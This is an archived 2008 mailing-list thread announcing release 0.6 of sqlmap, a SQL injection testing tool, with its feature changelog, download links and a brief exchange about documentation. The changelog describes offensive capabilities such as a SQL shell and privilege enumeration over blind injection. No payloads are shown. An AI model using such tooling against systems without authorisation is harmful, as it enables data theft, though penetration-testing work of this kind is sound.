Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobiles: +39-3493821385 (IT), +44-(0)7788962949 (UK)
PGP Key ID: 0x05F5A30F
From: Christian E. E. <c_e...@ya...> - 2008-09-01 14:10:17
----- Original message -----
From: Bernardo Damele A. G. <ber...@gm...>
To: sql...@li...
Sent: Monday, 1 September 2008, 16:03:12
Subject: Re: [sqlmap-users] sqlmap 0.6 released

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi Christian,

Christian Eric EDJENGUELE wrote:
> Great!,
> it's well documented, but the user documentation is not part of the program as well as the developer manual. it should be interesting to have a offline version of the developer manual with source code.

The user's manual is part of the sqlmap packages. You can find it at
doc/README.[html|pdf].

the user manual isn't part of windows binary :) as well as doc directory!

The developer's documentation is not part of the sqlmap package, it's
only available online because it's 4.8 Mb of files, but I will consider
to create a compressed package out of it and upload it to the
SourceForge File List page too.

- --
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile number: +39-3493821385
PGP Key ID: 0x05F5A30F
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFIu/YgdntYwQX1ow8RAiF6AKCkaQihjZPBAx7AAa649r6q71S/PACeJ5Fh
AqsW5PjG2eiZkXSrMJQXPMQ=
=lE9p
-----END PGP SIGNATURE-----
From: Bernardo D. A. G. <ber...@gm...> - 2008-09-01 14:03:19
|
Hi Christian,

Christian Eric EDJENGUELE wrote:
> Great!,
> it's well documented, but the user documentation is not part of the program as well as the developer manual. it should be interesting to have an offline version of the developer manual with source code.

The user's manual is part of the sqlmap packages. You can find it at doc/README.[html|pdf].

The developer's documentation is not part of the sqlmap package, it's only available online because it's 4.8 Mb of files, but I will consider to create a compressed package out of it and upload it to the SourceForge File List page too.

--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile number: +39-3493821385
PGP Key ID: 0x05F5A30F
|
From: Christian E. E. <c_e...@ya...> - 2008-09-01 13:55:59
|
Great!,
it's well documented, but the user documentation is not part of the program as well as the developer manual. it should be interesting to have an offline version of the developer manual with source code.

===
Christian Eric Edjenguele
IT Security Software Developer & Researcher
tel. +39 3408580513
View my linkedin profile: http://www.linkedin.com/in/edjenguele
My blog: http://www.edjenguele.blogspot.com
---
Management, Developers, Security Professionals – can only result in one thing…… better security.
http://www.owasp.org/index.php/OWASP_NYC_AppSec_2008_Conference
Sept 22nd-25th 2008

----- Original message -----
From: Bernardo Damele A. G. <ber...@gm...>
To: sql...@li...; sql...@li...
Sent: Monday 1 September 2008, 15:30:08
Subject: [sqlmap-users] sqlmap 0.6 released

> Hi,
>
> First of all thanks for subscribing to the sqlmap mailing lists.
> I am glad to release sqlmap version 0.6.
> Thanks to anyone of you that contributed with really appreciated and useful feedback.
>
> Changes
> =======
>
> Some of the new features include:
>
> * Added multithreading support to set the maximum number of concurrent HTTP requests.
> * Implemented SQL shell (--sql-shell) functionality and fixed SQL query (--sql-query, before called -e) to be able to run whatever SELECT statement and get its output in both inband and blind SQL injection attack.
> * Added an option (--privileges) to retrieve DBMS users privileges, it also notifies if the user is a DBMS administrator.
> * Added support (-c) to read options from configuration file, an example of valid INI file is sqlmap.conf and support (--save) to save command line options on a configuration file.
> * Implemented support for HTTPS requests over HTTP(S) proxy.
> * Enhanced logging system: added three more levels of verbosity to show also HTTP sent and received traffic.
>
> Complete list of changes at http://sqlmap.sourceforge.net/doc/ChangeLog.
>
> Download
> ========
>
> You can download it in various formats:
>
> * Source gzip compressed, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.tar.gz
> * Source bzip2 compressed, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.tar.bz2
> * Source zip compressed, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.zip
> * DEB binary package, http://downloads.sourceforge.net/sqlmap/sqlmap_0.6-1_all.deb
> * RPM binary package, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6-1.noarch.rpm
> * Portable executable for Windows that does not require the Python interpreter to be installed on the operating system, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6_exe.zip
>
> Note: the subversion repository is not accessible anymore so the only way to get the new release is to download it from one of the above links.
>
> Documentation
> =============
>
> * sqlmap user's manual: http://sqlmap.sourceforge.net/doc/README.pdf
> * sqlmap developer's documentation: http://sqlmap.sourceforge.net/dev/
>
> Happy hacking!
>
> --
> Bernardo Damele A. G.
> E-mail / Jabber: bernardo.damele (at) gmail.com
> Mobile number: +39-3493821385
> PGP Key ID: 0x05F5A30F
|